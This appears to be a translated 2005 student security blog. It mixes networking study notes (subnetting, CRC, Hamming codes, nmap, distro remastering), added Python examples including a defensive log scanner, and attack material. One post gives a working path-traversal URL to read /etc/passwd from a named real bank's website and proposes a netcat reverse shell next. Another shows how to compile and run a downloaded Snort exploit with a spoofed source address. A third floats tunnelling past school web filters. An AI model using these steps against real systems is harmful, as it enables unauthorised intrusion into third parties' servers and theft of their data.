I've thought of a project..
could we upload an html file (php, asp or whatever, etc.) to a web hosting service (e.g. geocities) and then browse to it before we go to a web site that school and university web filtering has declared illegal....
the method is like installing tor on an outside server, then using that server as a tunnel to browse websites that are not allowed by the organisation LAN we are using...
objective: to prove that web filtering is forced to update its signatures (like antivirus) because all sorts of programming can be done for html-based tunneling..
Formerly known as My QWERTY. I love to share tips and tricks with everybody.
::sh::My QWERTY
Friday, December 02, 2005
Idea - Signature Update on Web Filter
in bahasa
Friday, November 11, 2005
Subnet mask - range calculation
how to calculate subnet ranges from a subnet mask?
e.g. - 200.10.10.0 --> usable host 16
what is the 6th usable subnet range?
: from here we know every subnet must have 16 hosts..
so the 6th usable subnet range runs from the 6th subnet address to just before the 7th subnet address
6th subnet address = 16 x 6 = 96
7th subnet address = 16 x 7 = 112
the answer is : 200.10.10.96 to 200.10.10.111
what is the subnet number for the 4th usable subnet?
: 16 x 4 = 64
the answer is : 200.10.10.64
what is the subnet broadcast address for the 3rd usable subnet?
: take the 4th subnet, because the broadcast address of the 3rd subnet is the address just before the 4th subnet address.
16 x 4 = 64
the answer is : 200.10.10.63
what are the assignable addresses for the 5th usable subnet?
: 16 x 5 = 80 ; 16 x 6 = 96
range 200.10.10.80 to 200.10.10.95 ... then exclude the subnet address and the broadcast address
the answer is : 200.10.10.81 to 200.10.10.94
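The same arithmetic as an added Python example (not part of the original post). It assumes the base network is 200.10.10.0/24 and keeps the post's numbering, where subnet n starts at offset 16 x n; the function names are illustrative.

```python
import ipaddress

def nth_subnet(base, block_size, n):
    """n-th subnet of `base` cut into blocks of `block_size` addresses.

    Numbering follows the post: subnet n starts at offset block_size * n,
    so the block at offset 0 (subnet zero) is not counted.
    """
    net = ipaddress.ip_network(base)
    if block_size < 4 or block_size & (block_size - 1):
        raise ValueError("block size must be a power of two, at least 4")
    # A block of 2**k addresses needs k host bits, so the prefix is 32 - k.
    new_prefix = net.max_prefixlen - (block_size.bit_length() - 1)
    if new_prefix <= net.prefixlen:
        raise ValueError("block does not fit inside the base network")
    count = 2 ** (new_prefix - net.prefixlen)
    if not 1 <= n < count:
        raise ValueError("subnet index out of range: 1..%d" % (count - 1))
    start = int(net.network_address) + block_size * n
    return ipaddress.IPv4Network((start, new_prefix))

def describe(subnet):
    """Subnet number, broadcast, mask and assignable range as strings."""
    return {
        "subnet": str(subnet.network_address),
        "broadcast": str(subnet.broadcast_address),
        "mask": str(subnet.netmask),
        "first_host": str(subnet.network_address + 1),
        "last_host": str(subnet.broadcast_address - 1),
    }

if __name__ == "__main__":
    # The four questions worked through in the post.
    for n in (3, 4, 5, 6):
        print(n, describe(nth_subnet("200.10.10.0/24", 16, n)))
```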
Thursday, November 10, 2005
Data Can Be Corrupted During Transmission
Data can be corrupted during transmission. For reliable communication, errors must be detected and corrected.
Single-bit error vs burst error --> only 1 bit in error vs more than 1
Error detection uses the concept of redundancy, which means adding extra bits for detecting errors at the destination.
CRC is one of the detection methods (others: parity check [VRC + LRC], checksum)
CRC uses a polynomial as the divisor, e.g. x^7 + x^5 + x^2 + x + 1 --> 10100111
before sending, generate the remainder as the redundant bits.
e.g. data=100100 divisor=1101
then send data+remainder
on receipt, (data+remainder) divided by 1101 must give remainder '0'. else --> error.
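The sender and receiver steps above as an added Python example (not from the original post), using the post's data=100100 and divisor=1101. The function names and the error patterns are constructed for illustration.

```python
def poly_to_bits(exponents):
    """{7, 5, 2, 1, 0} -> '10100111' (one bit per power, highest first)."""
    return "".join("1" if e in exponents else "0"
                   for e in range(max(exponents), -1, -1))

def mod2_remainder(bits, divisor):
    """Remainder of modulo-2 long division: subtraction is XOR, no carries."""
    work = [int(b) for b in bits]
    div = [int(b) for b in divisor]
    for i in range(len(work) - len(div) + 1):
        if work[i]:                      # divisor "goes into" this position
            for j, d in enumerate(div):
                work[i + j] ^= d
    return "".join(str(b) for b in work[len(work) - len(div) + 1:])

def crc_encode(data, divisor):
    """Sender: append len(divisor)-1 zeros, divide, send data + remainder."""
    return data + mod2_remainder(data + "0" * (len(divisor) - 1), divisor)

def crc_ok(frame, divisor):
    """Receiver: the whole frame must divide with an all-zero remainder."""
    return "1" not in mod2_remainder(frame, divisor)

def flip(frame, error_mask):
    """XOR an error pattern (same length as the frame) into the frame."""
    return "".join(str(int(a) ^ int(b)) for a, b in zip(frame, error_mask))

if __name__ == "__main__":
    frame = crc_encode("100100", "1101")
    print(frame, crc_ok(frame, "1101"))               # intact frame
    print(crc_ok(flip(frame, "000001000"), "1101"))   # single-bit error
    print(crc_ok(flip(frame, "001110000"), "1101"))   # 3-bit burst error
    print(crc_ok(flip(frame, "000001101"), "1101"))   # error pattern == divisor
```

The last case passes the check although the frame is damaged, because an error pattern that is a multiple of the divisor leaves the remainder at zero. CRC catches transmission noise; it is not an integrity control against deliberate modification.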
for error correction, a Hamming code can be used.
redundant bits are placed so that every single bit of data is covered..
then put in the redundant bits.. r8, r4, r2, r1
do the check.. if there is an error, calculate which bit is in error...
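An added Python example (not from the original post) of the r1, r2, r4, r8 scheme for 7 data bits in an 11-bit codeword. It assumes even parity and counts positions from 1, left to right in the list; the sample data 1001101 and the function names are constructed.

```python
PARITY = (1, 2, 4, 8)   # positions of r1, r2, r4, r8 in the 11-bit codeword

def hamming_encode(data):
    """7 data bits -> 11-bit codeword (list, index 0 = position 1)."""
    if len(data) != 7 or set(data) - {"0", "1"}:
        raise ValueError("expected 7 bits")
    code = [0] * 12                      # slot 0 unused so index == position
    bits = iter(data)
    for pos in range(1, 12):
        if pos not in PARITY:            # data goes in 3,5,6,7,9,10,11
            code[pos] = int(next(bits))
    for r in PARITY:                     # r covers every position with bit r set
        code[r] = sum(code[p] for p in range(1, 12) if p & r) % 2
    return code[1:]

def syndrome(code):
    """Add up the parity checks that fail; for one flipped bit this is
    the position of that bit, and 0 means every check passed."""
    return sum(r for r in PARITY
               if sum(b for pos, b in enumerate(code, 1) if pos & r) % 2)

def hamming_correct(code):
    """Return (corrected codeword, position flipped back or 0)."""
    pos = syndrome(code)
    if pos > len(code):
        raise ValueError("syndrome %d is not a position: multi-bit error" % pos)
    fixed = list(code)
    if pos:
        fixed[pos - 1] ^= 1
    return fixed, pos

def with_errors(code, *positions):
    """Copy of the codeword with the given positions flipped."""
    damaged = list(code)
    for p in positions:
        damaged[p - 1] ^= 1
    return damaged

if __name__ == "__main__":
    sent = hamming_encode("1001101")
    print(sent, syndrome(sent))
    print(hamming_correct(with_errors(sent, 7)))     # one error: repaired
    print(hamming_correct(with_errors(sent, 3, 5)))  # two errors: wrong repair
```

The scheme corrects exactly one flipped bit. With two flipped bits the syndrome points at a third, innocent position (or at a position that does not exist), so the "correction" makes the codeword worse.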
Tuesday, October 18, 2005
Idea - Study nmap Source code
mission: nmap source code
objective: to learn how a scanner is built
vision: we can create our own scanner
how to do:
- download nmap with source code
- use nmap with the options provided
- compile nmap
- read source code
when:
-during UiTM semester holiday...
team:
-SIGs "Security & Network Admin" members... ;)
Tuesday, September 27, 2005
Read /etc/passwd from contentServ Vuln.
in Bahasa
(try looking through the exploit section of http://www.packetstormsecurity.org)
Systems that use contentServ are suspected of having a vuln.
contentServ is one of the CMSes.
a CMS is a content management system, a ready-made portal system that lets users build the portal's content themselves.
then google to find which web sites are using contentServ..
for example
Gebhard Bank » ad-hoc-Meldung vom 15.07.2005: Gebhard Bank weist ...
www.gebhardbank.de/contentserv/3.1/gebhardbank.de/index.php?StoryID=2291
next step, just type the addition (the one described on packetstorm) so it looks like this
http://www.gebhardbank.de/contentserv/3.1/..../etc/passwd%00
can you read its /etc/passwd now.. hehehehe
okay, next step, maybe we can use reverse telnet
note to self:
reverse telnet is a technique for an attacker to get into a system by instructing the system to be entered (for example by Mr. Suki) to telnet to the attacker's system, where a tool for reverse telnet has been set up. an example of a tool for reverse telnet is netcat (nc)
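From the defending side, requests of the shape shown above (a "../" sequence, a target under /etc, a trailing %00) stand out in web server logs once the URI is percent-decoded. An added Python example, not from the original post: the log lines, paths and the "page" parameter are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Sep/2005:10:01:02 +0000] "GET /portal/index.php?StoryID=2291 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [27/Sep/2005:10:03:40 +0000] "GET /portal/index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1411',
    '198.51.100.9 - - [27/Sep/2005:10:04:05 +0000] "GET /portal/index.php?page=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 404 310',
    '203.0.113.7 - - [27/Sep/2005:10:05:11 +0000] "GET /docs/release..notes.html HTTP/1.1" 200 880',
]

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
# ".." only counts as traversal when it is a whole path segment.
TRAVERSAL = re.compile(r'(?:^|[/\\=])\.\.(?:[/\\]|$)')
SENSITIVE = re.compile(r'/etc/(?:passwd|shadow)')

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so values encoded twice are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(uri):
    """Names of the checks the decoded request URI trips."""
    decoded = decode_fully(uri)
    findings = []
    if "\x00" in decoded:
        findings.append("null-byte")
    if TRAVERSAL.search(decoded):
        findings.append("traversal")
    if SENSITIVE.search(decoded):
        findings.append("sensitive-file")
    return findings

def scan(lines):
    """Return (client, status, findings) for every request that trips a check."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        findings = classify(m.group(2)) if m else []
        if findings:
            hits.append((m.group(1), int(m.group(3)), findings))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request answered with status 200 deserves attention first, since the server may have returned the file.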
Exploit Compiling (on C language)
1. get the exploit
(eg. http://www.packetstormsecurity.org/0509-ex.../snortrigger.c)
2. run gcc on your linux box (or whatever C compiler)
[root@kambing]# gcc snortrigger.c
3. ready to use
[root@kambing]# ./a.out
Usage: ./a.out [spoofed srcip]
Default srcip = 200.31.33.70
Thursday, August 11, 2005
Idea - Building a new Distro
in Bahasa:
google the keyword distro
turns out there are hundreds and thousands of linux (or bsd) distros that have been produced...
look at the list on distrowatch.com, oh my.. all kinds of names there...
let's say we have configured linux with only the important elements, that is, the ones that suit our tasks.
for example, for a security linux, we would put in lots of tools, ready-compiled scripts and the latest exploits that we took from various homepages (e.g. packetstormsecurity.org).. do you know how to produce an installer cd for that linux???
we can name it as our own distro and keep it in the form of an iso.
so if we want to use it or back it up, we just run it from a cd that already has that iso.
the question is..
do you know how to make that cd???
do you know or not??
if you know, how is it done???
I read 2 articles... [link1] [link2]
one is from a distro maker... he took a year and a half to build a distro for his company....
the second is from a knoppix remasterer.. he says it takes only two to five hours to remaster knoppix...
after that I read the how to remaster knoppix on the knoppix site..
it really does explain it step by step..